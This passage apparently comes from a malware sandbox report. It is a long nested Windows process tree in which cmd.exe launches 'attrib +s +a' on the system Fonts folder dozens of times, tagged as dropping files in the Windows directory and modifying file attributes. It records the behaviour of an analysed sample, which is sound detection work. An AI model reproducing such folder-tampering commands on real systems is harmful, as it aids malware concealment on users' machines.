                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3068
                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2524
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4856
                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        PID:2752
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2016
                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2504
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4936
                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              PID:1016
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:1636
                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                PID:1068
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4048
                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                  PID:3152
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4064
                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:3000
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1188
                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                        PID:640
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4128
                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                          PID:2916
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:1788
                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                            PID:224
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5112
                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                              PID:2464
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:2512
                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                PID:4780
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:3012
                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3720
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:3192
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                      PID:4816
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1984
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                        PID:1308
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:3300
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          PID:1352
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1428
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                              PID:3716
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:3044
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                PID:2808
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1016
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                  PID:3588
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1912
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2264
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                      PID:3008
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:688
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                        PID:3000
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                          PID:3412
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:3532
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                            PID:3724
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:224
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:3536
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                  PID:2740
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:4456
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                      PID:2528
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:3524
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                        PID:216
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2180
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:5088
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4876
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:4436
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4516
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                  PID:2128
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4224
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                    PID:1568
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:3976
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:5084
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:1100
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                          PID:4524
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:4556
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                            PID:1960
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:3404
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                              PID:880
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:3588
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:1224
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:2384
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                    PID:372
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:668
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                      PID:3980
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:2824
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:860
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:3660
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                              PID:1012
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1648
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:3264
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1668
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                    PID:5012
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:2396
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:1756
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:3280
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:4564
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                              PID:2712
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:2604
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:452
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:2212
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                    PID:4820
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1308
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                      PID:1928
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                      PID:212
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                        PID:3920
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:1100
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          PID:2480
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                          PID:4556
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:4088
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                              PID:4428
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                PID:3404
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:3612
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:712
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:2384
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1752
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                          PID:668
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                          PID:4080
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                            PID:2308
